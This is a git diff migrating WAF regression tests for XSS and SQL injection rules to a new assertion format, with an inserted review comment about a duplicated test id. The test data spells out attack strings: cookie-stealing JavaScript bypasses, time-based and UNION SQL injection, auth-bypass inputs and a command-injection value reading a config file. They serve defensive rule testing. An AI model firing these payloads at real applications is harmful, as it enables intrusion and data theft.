b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941320.yaml index 3c7a1ca8a..78cd01227 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941320.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941320.yaml @@ -18,4 +18,5 @@ tests: data: "var=\">" output: - log_contains: id "941330" + log: + expect_ids: [941330] 
diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml index d44fff9fb..d5c5238c6 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml @@ -18,7 +18,8 @@ tests: data: "var=' infoo.bar=&var2=whatever" version: HTTP/1.0 output: - log_contains: id "941340" + log: + expect_ids: [941340] - test_id: 2 desc: "XSS test based on portswigger XSS cheatsheet" stages: @@ -34,4 +35,5 @@ tests: data: "payload=XSS" version: HTTP/1.0 output: - log_contains: id "941340" + log: + expect_ids: [941340] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml index 703485f18..39834ce0d 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml @@ -18,4 +18,5 @@ tests: User-Agent: "OWASP CRS test agent" version: "HTTP/1.1" output: - log_contains: id "941350" + log: + expect_ids: [941350] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml index 0064de5d2..b09904023 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml @@ -19,7 +19,8 @@ tests: # Payload represents "alert(1)" in JSFuck encoding version: HTTP/1.1 output: - log_contains: id "941360" + log: + expect_ids: [941360] - test_id: 2 desc: "JSFuck / Hieroglyphy payload obfuscation attack" stages: 
@@ -36,7 +37,8 @@ tests: # Payload represents "a" in JSFuck / Hieroglyphy encoding version: HTTP/1.1 output: - log_contains: id "941360" + log: + expect_ids: [941360] - test_id: 3 desc: "JSFuck / Hieroglyphy payload obfuscation attack" stages: @@ -53,4 +55,5 @@ tests: # Payload represents "1" in JSFuck / Hieroglyphy encoding version: HTTP/1.1 output: - log_contains: id "941360" + log: + expect_ids: [941360] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml index 775109d42..36c8ee81b 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml @@ -18,7 +18,8 @@ tests: data: "a=document+%2F%2Afoo%2A%2F+.+++++cookie" version: HTTP/1.1 output: - log_contains: id "941370" + log: + expect_ids: [941370] - test_id: 2 desc: "Bypass using comments in syntax" stages: @@ -34,7 +35,8 @@ tests: data: "a=document%2F%2Afoo%2A%2F.%2F%2Abar%2A%2Fcookie" version: HTTP/1.1 output: - log_contains: id "941370" + log: + expect_ids: [941370] - test_id: 3 desc: "Bypass using JavaScript global variables" stages: @@ -50,7 +52,8 @@ tests: data: "a=window%5B%22alert%22%5D%28window%5B%22document%22%5D%5B%22cookie%22%5D%29" version: HTTP/1.1 output: - log_contains: id "941370" + log: + expect_ids: [941370] - test_id: 4 desc: "Bypass using JavaScript global variables and comments in syntax" stages: @@ -66,7 +69,8 @@ tests: data: "a=self%5B%2F%2Afoo%2A%2F%22alert%22%5D%28self%5B%22document%22%2F%2Abar%2A%2F%5D%5B%22cookie%22%5D%29" version: HTTP/1.1 output: - log_contains: id "941370" + log: + expect_ids: [941370] - test_id: 5 desc: "Bypass using JavaScript global variables and string concatenation" stages: 
@@ -82,7 +86,8 @@ tests: data: "a=self%5B%2F%2Afoo%2A%2F%22alert%22%5D%28self%5B%22document%22%2F%2Abar%2A%2F%5D%5B%22cookie%22%5D%29" version: HTTP/1.1 output: - log_contains: id "941370" + log: + expect_ids: [941370] - test_id: 6 desc: "Bypass using JavaScript global variables and comments in syntax" stages: @@ -98,7 +103,8 @@ tests: data: "a=self++%2F%2Ajhb%2A%2F++%5B++%2F%2Abar%2A%2F++%22alert%22%5D%28%22xss%22%29" version: HTTP/1.1 output: - log_contains: id "941370" + log: + expect_ids: [941370] - test_id: 7 desc: "Bypass using JavaScript global variables and jQuery globalEval" stages: @@ -114,7 +120,8 @@ tests: data: "a=self%5B%22%24%22%5D%5B%22globalEval%22%5D%28%22alert%281%29%22%29" version: HTTP/1.1 output: - log_contains: id "941370" + log: + expect_ids: [941370] - test_id: 8 desc: "Bypass using JavaScript global variables and hex escape sequence" stages: @@ -130,7 +137,8 @@ tests: data: "a=self%5B%22%5Cx24%22%5D" version: HTTP/1.1 output: - log_contains: id "941370" + log: + expect_ids: [941370] - test_id: 9 desc: "Bypass trying to access document.cookie using alternative syntax like (document)['cookie']" stages: @@ -146,7 +154,8 @@ tests: data: "a=%28document%29%5B%22cookie%22%5D" version: HTTP/1.1 output: - log_contains: id "941370" + log: + expect_ids: [941370] - test_id: 10 desc: "Bypass trying to access document.cookie using alternative syntax and comments like (document/*foo*/)['cookie']" stages: @@ -162,4 +171,5 @@ tests: data: "a=%28document%2F%2Afoo%2A%2F%29%5B%22cookie%22%5D" version: HTTP/1.1 output: - log_contains: id "941370" + log: + expect_ids: [941370] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml index 7953c58c0..b5aa4b1c6 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml 
@@ -18,4 +18,5 @@ tests: # /login?user={{constructor.constructor('alert(1)')()}} version: HTTP/1.1 output: - log_contains: id "941380" + log: + expect_ids: [941380] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941390.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941390.yaml index 02e655dda..2db0965f6 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941390.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941390.yaml @@ -17,7 +17,8 @@ tests: uri: "/get?arg=setInterval%28code%2C%201%29" version: HTTP/1.1 output: - log_contains: id "941390" + log: + expect_ids: [941390] - test_id: 2 desc: "JavaScript method: arg=x\";setTimeout(name, 1)//" stages: @@ -32,7 +33,8 @@ tests: uri: "/get?arg=x%22%3BsetTimeout%28name%2C%201%29%2F%2F" version: HTTP/1.1 output: - log_contains: id "941390" + log: + expect_ids: [941390] - test_id: 3 desc: "JavaScript method eval('2 + 2')" stages: @@ -47,7 +49,8 @@ tests: uri: "/get?arg=eval%28%272%20%2B%202%27%29" version: HTTP/1.1 output: - log_contains: id "941390" + log: + expect_ids: [941390] - test_id: 4 desc: "JavaScript constructor new Function()" stages: @@ -62,7 +65,8 @@ tests: uri: "/get?arg=new%20Function%28%29" version: HTTP/1.1 output: - log_contains: id "941390" + log: + expect_ids: [941390] - test_id: 5 desc: "JavaScript call alert" stages: @@ -77,7 +81,8 @@ tests: uri: "/get?arg=alert%28%29" version: HTTP/1.1 output: - log_contains: id "941390" + log: + expect_ids: [941390] - test_id: 6 desc: "JavaScript call atob" stages: @@ -92,7 +97,8 @@ tests: uri: "/get?arg=atob%28%29" version: HTTP/1.1 output: - log_contains: id "941390" + log: + expect_ids: [941390] - test_id: 7 desc: "JavaScript call btoa" stages: @@ -107,7 +113,8 @@ tests: uri: "/get?arg=btoa%28%29" version: HTTP/1.1 output: - log_contains: id "941390" + log: + expect_ids: [941390] - test_id: 8 desc: "JavaScript call prompt" stages: 
@@ -122,7 +129,8 @@ tests: uri: "/get?arg=prompt%28%29" version: HTTP/1.1 output: - log_contains: id "941390" + log: + expect_ids: [941390] - test_id: 9 desc: "JavaScript call confirm" stages: @@ -137,4 +145,5 @@ tests: uri: "/get?arg=confirm%28%29" version: HTTP/1.1 output: - log_contains: id "941390" + log: + expect_ids: [941390] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941400.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941400.yaml index 6650ffb2b..0ded97033 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941400.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941400.yaml @@ -17,7 +17,8 @@ tests: uri: "/get?xss=%5B%5D.sort.call%60%24%7Balert%7D1337%60" version: HTTP/1.1 output: - log_contains: id "941400" + log: + expect_ids: [941400] - test_id: 2 desc: "JavaScript function without parentheses" stages: @@ -32,7 +33,8 @@ tests: uri: "/get?xss=%5B%20%20%5D%20.%20sort%20.%20call%20%60%20%24%7B%20alert%20%7D%201337%20%60" version: HTTP/1.1 output: - log_contains: id "941400" + log: + expect_ids: [941400] - test_id: 3 desc: "JavaScript function without parentheses" stages: @@ -47,7 +49,8 @@ tests: uri: "/get?xss=%5B%20%20%5D%20.%20%2F%2A%2A%2F%20sort%20.%20call%20%60%20%24%7B%20alert%20%7D%201337%20%60" version: HTTP/1.1 output: - log_contains: id "941400" + log: + expect_ids: [941400] - test_id: 4 desc: "JavaScript function without parentheses" stages: @@ -62,7 +65,8 @@ tests: uri: "/get?xss=%5B%5D.map.call%60%24%7Beval%7D%5C%5Cu%7B61%7Dlert%5Cx281337%5Cx29%60" version: HTTP/1.1 output: - log_contains: id "941400" + log: + expect_ids: [941400] - test_id: 5 desc: "JavaScript function without parentheses" stages: 
@@ -77,7 +81,8 @@ tests: uri: "/get?xss=%5B%201234%20%5D.%20map%20.%20call%60%24%7Beval%7D%2F%2A%20asd%20%2A%2F%5C%5Cu%7B61%7Dlert%5Cx281337%5Cx29%60" version: HTTP/1.1 output: - log_contains: id "941400" + log: + expect_ids: [941400] - test_id: 6 desc: "JavaScript function without parentheses" stages: @@ -92,7 +97,8 @@ tests: uri: "/get?xss=Reflect.apply.call%60%24%7Bnavigation.navigate%7D%24%7Bnavigation%7D%24%7B%5Bname%5D%7D%60" version: HTTP/1.1 output: - log_contains: id "941400" + log: + expect_ids: [941400] - test_id: 7 desc: "Status Page Test - JavaScript minimal test with Reflect.sort.call``" stages: @@ -107,4 +113,5 @@ tests: uri: "/get?test=Reflect.sort.call%60%60" version: HTTP/1.1 output: - log_contains: id "941400" + log: + expect_ids: [941400] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942100.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942100.yaml index 7a8b5e8ca..e7c61638c 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942100.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942100.yaml @@ -19,7 +19,8 @@ tests: data: "var=1234 OR 1=1" version: HTTP/1.0 output: - log_contains: id "942100" + log: + expect_ids: [942100] - test_id: 2 desc: "Simple SQL injection" stages: @@ -35,7 +36,8 @@ tests: data: "var=-1839' or '1'='1" version: HTTP/1.0 output: - log_contains: id "942100" + log: + expect_ids: [942100] - test_id: 3 desc: "Simple SQL injection" stages: @@ -51,7 +53,8 @@ tests: data: "var=-1839\" or \"1\"=\"2" version: HTTP/1.0 output: - log_contains: id "942100" + log: + expect_ids: [942100] - test_id: 4 desc: "Basic SQL injection" stages: @@ -67,7 +70,8 @@ tests: data: "var=2010-01-01'+sleep(20.to_i)+'" version: HTTP/1.0 output: - log_contains: id "942100" + log: + expect_ids: [942100] - test_id: 5 desc: "Simple SQL injection" stages: 
@@ -83,7 +87,8 @@ tests: data: "var=EmptyValue' and 526=527" version: HTTP/1.0 output: - log_contains: id "942100" + log: + expect_ids: [942100] - test_id: 6 desc: "Simple SQL injection" stages: @@ -99,7 +104,8 @@ tests: data: "var=foo') UNION ALL select NULL --" version: HTTP/1.0 output: - log_contains: id "942100" + log: + expect_ids: [942100] - test_id: 7 desc: "Advanced SQL injection" stages: @@ -115,7 +121,8 @@ tests: data: "var=foo')waitfor%20delay'5%3a0%3a20'--" version: HTTP/1.0 output: - log_contains: id "942100" + log: + expect_ids: [942100] - test_id: 8 desc: "Simple SQL Injection" stages: @@ -131,7 +138,8 @@ tests: data: "var=JKGHUKGDI8TDHLFJH72FZLFJSKFH' and sleep(12) --" version: HTTP/1.0 output: - log_contains: id "942100" + log: + expect_ids: [942100] - test_id: 9 desc: "Simple SQL injection" stages: @@ -147,7 +155,8 @@ tests: data: "var=/path/to/file/unitests.txt') UNION ALL select NULL --" version: HTTP/1.0 output: - log_contains: id "942100" + log: + expect_ids: [942100] - test_id: 10 desc: "Advanced SQL Injection" stages: @@ -163,7 +172,8 @@ tests: data: "1'||(select extractvalue(xmltype('%toyop;" version: HTTP/1.0 output: - log_contains: id "942100" + log: + expect_ids: [942100] - test_id: 11 desc: "Simple function call" stages: @@ -179,7 +189,8 @@ tests: data: "var=sleep(20)" version: HTTP/1.0 output: - log_contains: id "942100" + log: + expect_ids: [942100] - test_id: 12 desc: "Advanced SQL injection" stages: @@ -195,7 +206,8 @@ tests: data: "var=unittests@coreruleset.org\" sleep(10.to_i) \"" version: HTTP/1.0 output: - log_contains: id "942100" + log: + expect_ids: [942100] - test_id: 13 desc: "Advanced injection" stages: @@ -211,7 +223,8 @@ tests: data: "var=\" | type %SystemDrive%\\\\config.ini | \"" version: HTTP/1.0 output: - log_contains: id "942100" + log: + expect_ids: [942100] - test_id: 14 desc: "Advanced SQL injection" stages: 
@@ -227,4 +240,5 @@ tests: data: "var=\"unittests@coreruleset.org\"')) and (select*from(select(sleep(5)))x) --" version: HTTP/1.0 output: - log_contains: id "942100" + log: + expect_ids: [942100] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942101.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942101.yaml index 7237a3bc7..5af7502c1 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942101.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942101.yaml @@ -18,7 +18,8 @@ tests: uri: "/post/1234%20OR%201=1" version: HTTP/1.0 output: - log_contains: id "942101" + log: + expect_ids: [942101] - test_id: 2 desc: "Basic SQL injection" stages: @@ -33,7 +34,8 @@ tests: uri: "/post/2010-01-01'+sleep(20.to_i)+'" version: HTTP/1.0 output: - log_contains: id "942101" + log: + expect_ids: [942101] - test_id: 3 desc: "Simple SQL injection" stages: @@ -48,7 +50,8 @@ tests: uri: "/post/EmptyValue'%20and%20526=527" version: HTTP/1.0 output: - log_contains: id "942101" + log: + expect_ids: [942101] - test_id: 4 desc: "Advanced SQL injection" stages: @@ -63,7 +66,8 @@ tests: uri: "/post/foo')waitfor%20delay'5%3a0%3a20'--" version: HTTP/1.0 output: - log_contains: id "942101" + log: + expect_ids: [942101] - test_id: 5 desc: "Simple function call" stages: @@ -78,7 +82,8 @@ tests: uri: "/post/sleep(20)" version: HTTP/1.0 output: - log_contains: id "942101" + log: + expect_ids: [942101] - test_id: 6 desc: "Advanced SQL injection" stages: @@ -93,7 +98,8 @@ tests: uri: "/post/unittests@coreruleset.org\"%20sleep(10.to_i)%20\"" version: HTTP/1.0 output: - log_contains: id "942101" + log: + expect_ids: [942101] - test_id: 7 desc: "SQL Injection at the last segment of the path (request_basename detection)" stages: 
@@ -108,7 +114,8 @@ tests: uri: "/post/foo/24'union+all+select+1,2,3+from+aa" version: HTTP/1.0 output: - log_contains: id "942101" + log: + expect_ids: [942101] - test_id: 8 desc: "SQL Injection inside the path (request_filename detection)" stages: @@ -123,7 +130,8 @@ tests: uri: "/post/foo/24'union+all+select+1,2,3+from+aa/bar" version: HTTP/1.0 output: - log_contains: id "942101" + log: + expect_ids: [942101] - test_id: 9 desc: "SQL Injection inside the path with comment block (request_filename detection)" stages: @@ -138,7 +146,8 @@ tests: uri: "/post/%2A/%2A/2+union+all/bar" version: HTTP/1.0 output: - log_contains: id "942101" + log: + expect_ids: [942101] - test_id: 10 desc: "Negative test with incomplete SQL command inside the path" stages: @@ -153,7 +162,8 @@ tests: uri: "/post/foo/9'union+all/bar" version: HTTP/1.0 output: - no_log_contains: id "942101" + log: + no_expect_ids: [942101] - test_id: 11 desc: "Negative test with complete SQL command inside the path, but without comma" stages: @@ -168,4 +178,5 @@ tests: uri: "/post/foo/24+union+all+select+1,2,3+from+aa/bar" version: HTTP/1.0 output: - no_log_contains: id "942101" + log: + no_expect_ids: [942101] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml index f3a5ec7b7..2fbb65a60 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml @@ -3,6 +3,7 @@ meta: author: "Christian S.J. Peron, Christoph Hansen, Franziska Bühler, azurit" description: None tests: + - test_id: 1 - test_id: 1 desc: "SQL Injection Attack: SQL Operator Detected" stages: @@ -17,7 +18,8 @@ tests: uri: "/get?var=blahblah&var2=LIKE%20NULL" version: HTTP/1.0 output: - log_contains: id "942120" + log: + expect_ids: [942120] - test_id: 2 desc: "SQL Injection Attack: SQL Operator Detected" stages: 
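Review bot: The `@@ -3,6 +3,7 @@ meta:` hunk of `tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml` adds a second `- test_id: 1` entry directly above the existing test 1, with no `desc` and no `stages`, so the file now carries a duplicate test id and an empty test case. This does not belong to the `log_contains` → `expect_ids` migration the rest of the commit performs and looks like an accidental keystroke. Depending on how the runner treats an entry without `stages`, it will presumably either reject the file or silently register an empty test under the same id, masking the real test 1 in per-id reporting. Remove the added line `  - test_id: 1` so the `tests:` sequence starts with the original, fully specified test 1.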
@@ -33,7 +35,8 @@ tests: data: "pay=RegExp" version: HTTP/1.0 output: - log_contains: id "942120" + log: + expect_ids: [942120] - test_id: 3 desc: "SQL Injection Attack: SQL Operator Detected" stages: @@ -49,7 +52,8 @@ tests: data: ">>" version: HTTP/1.0 output: - log_contains: id "942120" + log: + expect_ids: [942120] - test_id: 4 desc: "SQL Injection Attack: SQL Operator Detected" stages: @@ -65,7 +69,8 @@ tests: data: "pay=%26%26" version: HTTP/1.0 output: - log_contains: id "942120" + log: + expect_ids: [942120] - test_id: 5 desc: "SQL Injection Attack: SQL Operator Detected" stages: @@ -81,7 +86,8 @@ tests: data: "<<" version: HTTP/1.0 output: - log_contains: id "942120" + log: + expect_ids: [942120] - test_id: 6 desc: "SQL Injection Attack: SQL Operator Detected" stages: @@ -97,7 +103,8 @@ tests: data: "%21%3D" version: HTTP/1.0 output: - log_contains: id "942120" + log: + expect_ids: [942120] - test_id: 7 desc: "SQL Injection Attack: SQL Operator Detected" stages: @@ -113,7 +120,8 @@ tests: data: "||" version: HTTP/1.0 output: - log_contains: id "942120" + log: + expect_ids: [942120] - test_id: 8 desc: "SQL Injection Attack: SQL Operator Detected" stages: @@ -129,7 +137,8 @@ tests: data: "XOR" version: HTTP/1.0 output: - log_contains: id "942120" + log: + expect_ids: [942120] - test_id: 9 desc: "SQL Injection Attack: SQL Operator Detected" stages: @@ -145,7 +154,8 @@ tests: data: "pay=%3C%3D" version: HTTP/1.0 output: - log_contains: id "942120" + log: + expect_ids: [942120] - test_id: 10 desc: "SQL Injection Attack: SQL Operator Detected" stages: @@ -161,7 +171,8 @@ tests: data: "IS NULL" version: HTTP/1.0 output: - log_contains: id "942120" + log: + expect_ids: [942120] - test_id: 11 desc: "SQL Injection Attack: SQL Operator Detected" stages: @@ -177,7 +188,8 @@ tests: data: "in (0,1)" version: HTTP/1.0 output: - log_contains: id "942120" + log: + expect_ids: [942120] - test_id: 12 desc: "SQL Injection Attack: SQL Operator Detected" stages: 
@@ -193,7 +205,8 @@ tests: data: "in (2147483647,-1)" version: HTTP/1.0 output: - log_contains: id "942120" + log: + expect_ids: [942120] - test_id: 13 desc: "SQL Injection Attack: SQL Operator Detected" stages: @@ -209,7 +222,8 @@ tests: data: "pay=%3C%3D%3E" version: HTTP/1.0 output: - log_contains: id "942120" + log: + expect_ids: [942120] - test_id: 14 desc: "SQL Injection Attack: SQL Operator Detected" stages: @@ -225,7 +239,8 @@ tests: data: "regexp" version: HTTP/1.0 output: - log_contains: id "942120" + log: + expect_ids: [942120] - test_id: 15 desc: "SQL Injection Attack: SQL Operator Detected" stages: @@ -241,7 +256,8 @@ tests: data: "RLIKE" version: HTTP/1.0 output: - log_contains: id "942120" + log: + expect_ids: [942120] - test_id: 16 desc: "SQL Injection Attack: SQL Operator Detected" stages: @@ -257,7 +273,8 @@ tests: data: "<>" version: HTTP/1.0 output: - log_contains: id "942120" + log: + expect_ids: [942120] - test_id: 17 desc: "SQL Injection Attack: SQL Operator Detected" stages: @@ -273,7 +290,8 @@ tests: data: "+in+%28++select+anfrage_id+from+erkenntnisse+where+id+is++not++null++%29%0A" version: HTTP/1.0 output: - log_contains: id "942120" + log: + expect_ids: [942120] - test_id: 18 desc: "SQL Injection Attack: SQL Operator Detected" stages: @@ -289,7 +307,8 @@ tests: data: "+IN+%28815914%2C+815913%29%0A" version: HTTP/1.0 output: - log_contains: id "942120" + log: + expect_ids: [942120] - test_id: 19 desc: "SQL Injection Attack: SQL Operator Detected" stages: @@ -305,7 +324,8 @@ tests: data: "+IN+%28815919%2C+815920%2C+815921%2C+815922%2C+815923%2C+815924%2C+815925%2C+815926%2C+815927%2C+815928%2C+815929%2C+815930%2C+815932%2C+815933%2C+815934%2C+815935%2C+815936%2C+815937%2C+815917%2C+815918%29%0A" version: HTTP/1.0 output: - log_contains: id "942120" + log: + expect_ids: [942120] - test_id: 20 desc: "SQL Injection Attack: SQL Operator Detected" stages: 
@@ -321,7 +341,8 @@ tests: data: "pay= in ( Aa,- Ab-, and Ac)" version: HTTP/1.0 output: - log_contains: id "942120" + log: + expect_ids: [942120] - test_id: 21 desc: "SQL Injection Attack: SQL Operator Detected" stages: @@ -337,7 +358,8 @@ tests: data: "%3E%3D" version: HTTP/1.0 output: - log_contains: id "942120" + log: + expect_ids: [942120] - test_id: 22 desc: "SQL Injection Attack: not between * and " stages: @@ -353,7 +375,8 @@ tests: data: "select%20*%20from%20user%20where%20password_last_changed%20not%20between%20'2021-04-11'%20and%20'2021-04-11'" version: HTTP/1.0 output: - log_contains: id "942120" + log: + expect_ids: [942120] - test_id: 23 desc: "SQL Injection Attack: SQL Operator Detected" stages: @@ -369,7 +392,8 @@ tests: data: "email=z'or%20email%20notnull--" version: HTTP/1.0 output: - log_contains: id "942120" + log: + expect_ids: [942120] - test_id: 24 desc: "SQL Injection Attack: SQL Operator Detected" stages: @@ -385,7 +409,8 @@ tests: data: "email=x'%20or%20username%20like%20totpSecret%20escape%20'x';" version: HTTP/1.0 output: - log_contains: id "942120" + log: + expect_ids: [942120] - test_id: 25 desc: "SQL Injection Attack: SQL Operator Detected" stages: @@ -401,7 +426,8 @@ tests: data: "email=admin%40juice-sh.op'%20and%20email%20ilike%20email--" version: HTTP/1.0 output: - log_contains: id "942120" + log: + expect_ids: [942120] - test_id: 26 desc: "SQL Injection Attack: SQL Operator Detected" stages: @@ -417,7 +443,8 @@ tests: data: "email=admin%40juice-sh.op'%20and%20email%20%3d%20all%20(select%20email)--" version: HTTP/1.0 output: - log_contains: id "942120" + log: + expect_ids: [942120] - test_id: 27 desc: "SQLite collate nocase" stages: @@ -433,7 +460,8 @@ tests: data: "var=user'collate%20nocase--" version: HTTP/1.0 output: - log_contains: id "942120" + log: + expect_ids: [942120] - test_id: 28 desc: "SQLite collate nocase" stages: 
@@ -449,7 +477,8 @@ tests: data: "var=user'collate%20nocase--" version: HTTP/1.0 output: - log_contains: id "942120" + log: + expect_ids: [942120] - test_id: 29 desc: "SQL collate`nocase`" stages: @@ -465,7 +494,8 @@ tests: data: "var=user'collate%60nocase%60--" version: HTTP/1.0 output: - log_contains: id "942120" + log: + expect_ids: [942120] - test_id: 30 desc: "Invalid SQL collate foo" stages: @@ -481,7 +511,8 @@ tests: data: "var=user'collate%20foo--" version: HTTP/1.0 output: - no_log_contains: id "942120" + log: + no_expect_ids: [942120] - test_id: 31 desc: "Invalid SQL collate foo" stages: @@ -498,7 +529,8 @@ tests: data: "var=user'collate%60utf8mb4_general_ci%60--" version: HTTP/1.0 output: - log_contains: id "942120" + log: + expect_ids: [942120] - test_id: 32 desc: "Collate bypass with character escaping" stages: @@ -515,7 +547,8 @@ tests: data: "var=user'collate%22%5Cutf8mb4_general_ci%22--" version: HTTP/1.0 output: - log_contains: id "942120" + log: + expect_ids: [942120] - test_id: 33 desc: "Collate bypass with postgress string escaping U&" stages: @@ -532,7 +565,8 @@ tests: data: "var=user'collate U%26%22%241%23B%23E%23D%22--" version: HTTP/1.0 output: - log_contains: id "942120" + log: + expect_ids: [942120] - test_id: 34 desc: "Detect auth bypass email=' notnull --" stages: @@ -548,7 +582,8 @@ tests: data: "email=%27%20notnull%20--" version: HTTP/1.0 output: - log_contains: id "942120" + log: + expect_ids: [942120] - test_id: 35 desc: "Test for IJ5N1CXB - unlikely" stages: @@ -564,7 +599,8 @@ tests: data: "email=admin%40juice-sh.op'and%20unlikely%20(id)--" version: HTTP/1.0 output: - log_contains: id "942120" + log: + expect_ids: [942120] - test_id: 36 desc: "Negative test for IJ5N1CXB - unlikely" stages: 
@@ -580,7 +616,8 @@ tests: data: text=It is highly unlikely this is going to be a false positive version: HTTP/1.0 output: - no_log_contains: id "942120" + log: + no_expect_ids: [942120] - test_id: 37 desc: "Test for HOH7M88Q - likelihood" stages: @@ -597,7 +634,8 @@ tests: email=admin%40juice-sh.op\'%20and(%20likelihood%20(id,.0));' version: HTTP/1.1 output: - log_contains: id "942120" + log: + expect_ids: [942120] - test_id: 38 desc: "Negative test for HOH7M88Q - likelihood" stages: @@ -614,7 +652,8 @@ tests: text=After calculating the likelihood this should not be matched. version: HTTP/1.1 output: - no_log_contains: id "942120" + log: + no_expect_ids: [942120] - test_id: 39 desc: "Detect path-based SQLi attempt" stages: @@ -629,4 +668,5 @@ tests: uri: "/post/catalogue/rest/products/2499999||this.product/reviews" version: HTTP/1.0 output: - log_contains: id "942120" + log: + expect_ids: [942120] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml index 7811cf31f..ce94374b6 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml @@ -18,7 +18,8 @@ tests: data: "var=%221%22%20sSOUNDS%20LIKE%20%22SOUNDS%20LIKE%201&other_var=test" version: HTTP/1.0 output: - no_log_contains: id "942130" + log: + no_expect_ids: [942130] - test_id: 2 desc: "SQL Injection Attack: SQL Tautology" stages: @@ -32,7 +33,8 @@ tests: uri: "/get?a=1=1" version: HTTP/1.1 output: - log_contains: id "942130" + log: + expect_ids: [942130] - test_id: 3 desc: "SQL Injection Attack: SQL Tautology" stages: @@ -46,7 +48,8 @@ tests: uri: "/get?a=11=1" version: HTTP/1.1 output: - no_log_contains: id "942130" + log: + no_expect_ids: [942130] - test_id: 4 desc: "SQL Injection Attack: SQL Tautology" stages: 
@@ -60,7 +63,8 @@ tests: uri: "/get?a=1=11" version: HTTP/1.1 output: - no_log_contains: id "942130" + log: + no_expect_ids: [942130] - test_id: 5 desc: "SQL Injection Attack: SQL Tautology" stages: @@ -74,7 +78,8 @@ tests: uri: "/get?a=11!=11" version: HTTP/1.1 output: - no_log_contains: id "942130" + log: + no_expect_ids: [942130] - test_id: 6 desc: "SQL Injection Attack: SQL Tautology" stages: @@ -88,7 +93,8 @@ tests: uri: "/get?a=b,1=1" version: HTTP/1.1 output: - log_contains: id "942130" + log: + expect_ids: [942130] - test_id: 7 desc: "SQL Injection Attack: SQL Tautology - like" stages: @@ -103,7 +109,8 @@ tests: data: "a=42%20like%2042" version: HTTP/1.1 output: - log_contains: id "942130" + log: + expect_ids: [942130] - test_id: 8 desc: "SQL Injection Attack: SQL Tautology" stages: @@ -117,7 +124,8 @@ tests: uri: "/get?a=This%20is%20like%20no%20other" version: HTTP/1.1 output: - no_log_contains: id "942130" + log: + no_expect_ids: [942130] - test_id: 9 desc: "SQL Injection Attack: SQL Tautology using MySQL NULL-safe operator <=>" stages: @@ -131,7 +139,8 @@ tests: uri: "/get?a=42<=>42" version: HTTP/1.1 output: - log_contains: id "942130" + log: + expect_ids: [942130] - test_id: 10 desc: "SQL Injection Attack: SQL Tautology using glob" stages: @@ -145,4 +154,5 @@ tests: uri: "/get?user=admin%40juice-sh.op'%20and%20password%20glob%20password;" version: HTTP/1.1 output: - log_contains: id "942130" + log: + expect_ids: [942130] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942131.yaml 